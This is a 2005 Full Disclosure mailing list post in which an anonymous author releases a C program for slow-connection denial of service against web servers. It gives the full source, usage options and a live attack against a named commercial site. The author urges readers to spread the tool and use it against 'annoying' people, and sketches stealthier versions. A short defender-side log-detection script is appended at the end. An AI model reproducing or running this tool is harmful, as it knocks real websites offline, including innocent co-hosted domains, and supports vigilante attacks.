Full Disclosure mailing list archives
web server DoS
From: George Orwell <nobody () mixmaster it>
Date: Mon, 25 Apr 2005 21:52:11 +0200 (CEST)
DoS - denial of service of web servers

Usually when someone is annoying (sending spam, killing people or peoples, extincting species, torturing sensitive creatures) you might talk to them to work it out or take legal actions (complaining to the ISP of a spammer). But if this is not enough you can use dos to down their web site. Be aware that many web servers host multiple, often unrelated web sites. So by DoSing a web server you might also down innocent domains. This would increase pressure on the annoying person and their ISP, but may raise justified (legal) trouble and violate your ethics.

When started without arguments dos prints this:

---------------------------------------------------------------
dos version 2.0 - denial of service attack against web servers:
Usage: ./dos options hostname
options with default values:
-h this help
-p 80 port number of remote host to connect to
-c 200 maximum number of simultaneous connections
-t 1h duration of dos attack. possible units:
s=seconds (default)
m=minutes
h=hours
d=days

Example: ./dos -t 365d trafficmagnet.com -c 20

Warning! DoS attacks may be illegal in your country.
Your ISP may close your internet access.
Your IP address (which identifies your internet connection)
typically appears in the attacked servers log files.
This may be improved in future versions.

The readme file contains further hints and information.
----------------------------------------------------------------

dos will try to make and maintain as many connections as given with the -c option. It does not send any requests so the connections will time out after a while. Many web servers process only a certain amount of connections (e.g. 150) and processing of further connections will be delayed by several minutes.

Many web servers can be disabled with a single invocation of dos. However, the risk of legal actions or complaints to your ISP is considerable. It is also relatively easy to block your IP address with a firewall.
A website may seem to be down but reachable from a different host (e.g. when using a proxy).

So a different tactic is to use a low connection limit, e.g. 10% of the server limit, and a long time. This will not disable the server unless many people do that. This may happen if the dos program is spread widely and used frequently against annoying people's web servers. The owners of web sites will less likely sue people or complain to their ISPs if they are attacked by many people and would need to constantly add new people to their firewall. Rather they will install an automatic intrusion detection system or firewall.

Then it is time to further develop dos. It will then download preferably large files very slowly many times in parallel. This should be more difficult to detect as it is "normal" usage of a web server. It will disable web servers by keeping all the connections busy and additionally the web server may have to keep more information in memory for each file being downloaded.

The activity of dos leaves traces in web servers' log files.

In Apache's access.log:

10.0.0.13 - - [19/Apr/2005:19:32:59 +0200] "-" 408 - "-" "-"

408 means Request Timeout - The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time. From http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html . 10.0.0.13 is the IP address. It is possible to prevent this log entry (at least on my apache) by closing the connections before they time out.

In error.log:

[Tue Apr 19 14:51:23 2005] [error] server reached MaxClients setting, consider raising the MaxClients setting

If you specify a too high number with -c you get a message like 'There are only 1018 simultaneous connections supported currently.' The usual limit on Linux is 1024 minus the number of files that are open when dos starts. The limit with cygwin is 64 (with 2 open files, IIRC). Making dos windows native may raise that limit.
dos includes the FD_SETSIZE constant as the absolute limit when it is compiled from the C source code to the executable/binary form. If you use a binary and suspect that your OS supports more connections than dos says, recompile dos. If you want to make more connections than supported, run dos multiple times.

Here is a real example. trafficmagnet.com is the web site of the spammer "Sarah Williams". They got well known for advertising their useless business in email spam.

./dos trafficmagnet.com
time=3600, hostname=trafficmagnet.com, port=80, connections=200
200/222,314/3600

200=current number of connections
222=total connections made so far
314 of 3600s have passed

In this case it took 53 minutes (!) to load the web page:

time wget http://trafficmagnet.com
--18:43:12-- http://trafficmagnet.com/
 => `index.html.10'
Resolving trafficmagnet.com... done.
Connecting to trafficmagnet.com[202.157.184.231]:80... connected.
HTTP request sent, awaiting response...
Read error (Connection reset by peer) in headers.
Retrying.

--18:46:28-- http://trafficmagnet.com/
 (try: 2) => `index.html.10'
Connecting to trafficmagnet.com[202.157.184.231]:80... connected.
HTTP request sent, awaiting response...
Read error (Connection timed out) in headers.
Retrying.

--19:01:30-- http://trafficmagnet.com/
 (try: 3) => `index.html.10'
Connecting to trafficmagnet.com[202.157.184.231]:80... connected.
HTTP request sent, awaiting response...
Read error (Connection timed out) in headers.
Retrying.

--19:16:32-- http://trafficmagnet.com/
 (try: 4) => `index.html.10'
Connecting to trafficmagnet.com[202.157.184.231]:80... connected.
HTTP request sent, awaiting response...
Read error (Connection timed out) in headers.
Retrying.

--19:31:36-- http://trafficmagnet.com/
 (try: 5) => `index.html.10'
Connecting to trafficmagnet.com[202.157.184.231]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,953 [text/html]

100%[========================================================>] 9,953 17.14K/s ETA 00:00

19:36:27 (17.14 KB/s) - `index.html.10' saved [9953/9953]

real 53m15.686s
user 0m0.025s
sys 0m0.040s

I release dos under the GNU general public license. Please give it to your friends.

Since I want to avoid spammers and other annoying folks to turn dos against me I will remain anonymous. You may send messages to me in alt.anonymous.messages with a subject of 635D3815 - my gpg key id. I can not promise that I will actually check this newsgroup for mail.

If you know a place (http/ftp) that is willing and able (invulnerable to dos DoS attacks) to host dos please tell me (via alt.anonymous.messages). There's gonna be a trust problem distributing this as binary. Well, there should be.

Anyone wants to make a gui?

635D (I will go by this name for now)

My signature on dos-2.0.c:
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/select.h> #include <netinet/ip.h> #include <netdb.h> #include <getopt.h> #include <errno.h> extern int h_errno; void usage(int rc); int myselect(int wait); #if 200>FD_SETSIZE #define MAXP FD_SETSIZE #else #define MAXP 200 #endif /* variable names np number of currently parallel connections nt total number of connections made so far maxp maximum number of parallel connections t0 unix time at program start cl connection limit */ int s[FD_SETSIZE],cl=FD_SETSIZE; unsigned int maxp=MAXP; char *argv0; int main(int argc, char **argv) { int rc,i,np,c,opt1=0,nt=0; unsigned int mytime=3600; unsigned short port=80; struct hostent *h; struct sockaddr_in sa={AF_INET,0,{0}}; char *hostname="",timeunit='s'; time_t t0; //how many sockets can we make? for (i=0;i<FD_SETSIZE;i++) { if (-1==(s[i]=socket(PF_INET,SOCK_STREAM,6)) ) { if (EMFILE==errno) { cl=i; break; } else { perror("socket()"); exit(8); } } } for (i=0;i<cl;i++) { close(s[i]); s[i]=-1; } argv0=argv[0]; if (argc==1) usage(0); while (1) { c = getopt(argc, argv, "-hp:t:c:"); if (c == -1) break; switch (c) { case 1: if (++opt1>1) { puts("too many arguments"); exit(1); } hostname=optarg; break; case 'h': usage(0); break; case 'p': if (1!=sscanf(optarg,"%hd",&port)) { puts("invalid port"); exit(2); } break; case 't': rc=sscanf(optarg,"%d%c",&mytime,&timeunit); if (2!=rc && 1!=rc) { puts("invalid time"); exit(3); } switch (timeunit) { case 's': break; case 'm': mytime*=60; break; case 'h': mytime*=3600; break; case 'd': mytime*=24*3600; break; default: printf("Invalid time unit '%c'\n",timeunit); exit(3); break; } break; case 'c': if (1!=sscanf(optarg,"%d",&maxp)) { puts("invalid connection limit"); exit(4); } if (maxp>cl) { printf("There are only %d simultaneous connections supported currently.\n",cl); puts("The readme file contains information about this limit."); exit(5); } break; case '?': exit(3); break; default: printf ("?? 
getopt returned character code 0%o ??\n", c); exit(6); } } printf ("time=%u, hostname=%s, port=%hu, connections=%u\n", mytime,hostname,port,maxp); if (0==opt1) { puts("missing hostname"); exit(8); } if (!(h=gethostbyname(hostname))) { printf("unknown host %s: %d\n",argv[1],h_errno); exit(6); } memcpy(&sa.sin_addr.s_addr,h->h_addr_list[0],h->h_length); //sa.sin_addr.s_addr=h->h_addr_list[0]; sa.sin_port=htons(port); t0=time(NULL); while (1) { for (i=0;i<maxp;i++) { while (-1==s[i]) { if (-1==(s[i]=socket(PF_INET,SOCK_STREAM,6)) ) { perror("socket()"); exit(8); } if (-1==connect(s[i],(struct sockaddr *) &sa,sizeof(sa))) { perror("\nconnect failed"); close(s[i]); s[i]=-1; sleep(1); } else { nt++; } np=myselect(0); printf(" %d/%d,%d/%d \r",np,nt,(time(NULL)-t0),mytime); fflush(stdout); if (time(NULL)-t0>mytime) exit(10); } } if (np==maxp) { np=myselect(1); printf(" %d/%d,%d/%d \r",np,nt,(time(NULL)-t0),mytime); fflush(stdout); } if (time(NULL)-t0>mytime) exit(10); } //while 1 } // main() int myselect(int wait) { int np=0,i,retval,maxs=-1; struct timeval tv; fd_set rfds; FD_ZERO(&rfds); for (i=0;i<maxp;i++) { if (-1!=s[i]) { maxs=s[i]>maxs ? s[i] : maxs; FD_SET(s[i],&rfds); np++; } } if (-1==maxs++) return(0); if (wait) { tv.tv_sec=1; tv.tv_usec=0; } else { tv.tv_sec=0; tv.tv_usec=0; } retval = select(maxs, &rfds, NULL, NULL, &tv); if (retval == -1) { perror("select()"); exit(9); } else if (0==retval) { // printf("select() returned with empty set?!?\n"); // exit(2); } else { for (i=0;i<maxp;i++) { if (s[i]!=-1 && FD_ISSET(s[i],&rfds)) { close(s[i]); s[i]=-1; np--; } } } return(np); } //myselect() void usage(int rc) { puts("\ndos version 2.0 - denial of service attack against web servers:"); printf("Usage: %s options hostname\n",argv0); puts("options with default values:"); puts("-h this help"); puts("-p 80 port number of remote host to connect to"); printf("-c %d maximum number of simultaneous connections\n",200>cl ? cl : 200); puts("-t 1h duration of dos attack. 
possible units:"); puts("s=seconds (default)"); puts("m=minutes"); puts("h=hours"); puts("d=days"); printf("\nExample: %s -t 365d trafficmagnet.com -c 20\n",argv0); puts("\nWarning! DoS attacks may be illegal in your country."); puts("Your ISP may close your internet access."); puts("Your IP address (which identifies your internet connection)"); puts("typically appears in the attacked servers log files."); puts("This may be improved in future versions."); puts("\nThe readme file contains further hints and information.\n"); exit(rc); } //usage()
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
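
A defender-side check for the access.log trace described in the post, added here as an example (it is not part of the original message or of dos): it counts `"-" 408` entries per client address in a sliding window and reports the addresses that reach a threshold. The function names, the threshold and window defaults, and every sample line other than the post's 10.0.0.13 entry are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common/combined log prefix: host ident user [time] "request" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) ')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

def idle_timeout_sources(lines, threshold=20, window=timedelta(minutes=5)):
    """Map each client address to its peak number of '"-" 408' entries
    inside any `window`, for clients that reach `threshold` (both assumed)."""
    recent = defaultdict(deque)  # address -> timestamps still inside the window
    peak = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        addr, stamp, request, status = m.groups()
        if request != "-" or status != "408":
            continue  # a request was received, or the outcome was different
        ts = datetime.strptime(stamp, TIME_FMT)
        q = recent[addr]
        q.append(ts)
        while ts - q[0] > window:  # drop entries older than the window
            q.popleft()
        if len(q) >= threshold:
            peak[addr] = max(peak.get(addr, 0), len(q))
    return peak

def sample_log():
    """Constructed input: 25 timeouts from 10.0.0.13, one second apart,
    plus one ordinary request and one stray timeout from other hosts."""
    start = datetime(2005, 4, 19, 19, 32, 59, tzinfo=timezone(timedelta(hours=2)))
    lines = ['10.0.0.13 - - [%s] "-" 408 - "-" "-"'
             % (start + timedelta(seconds=i)).strftime(TIME_FMT) for i in range(25)]
    lines.append('10.0.0.7 - - [%s] "GET / HTTP/1.0" 200 9953 "-" "-"'
                 % start.strftime(TIME_FMT))
    lines.append('10.0.0.8 - - [%s] "-" 408 - "-" "-"' % start.strftime(TIME_FMT))
    return lines

if __name__ == "__main__":
    for addr, count in idle_timeout_sources(sample_log()).items():
        print(f"{addr}: {count} connections timed out without a request")
```

Because the post notes that closing connections before they time out avoids the 408 entry, this check is best paired with a per-address count of established connections and an alert on the MaxClients message in error.log.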
Current thread:
- web server DoS George Orwell (Apr 25)
- Re: web server DoS Valdis . Kletnieks (Apr 25)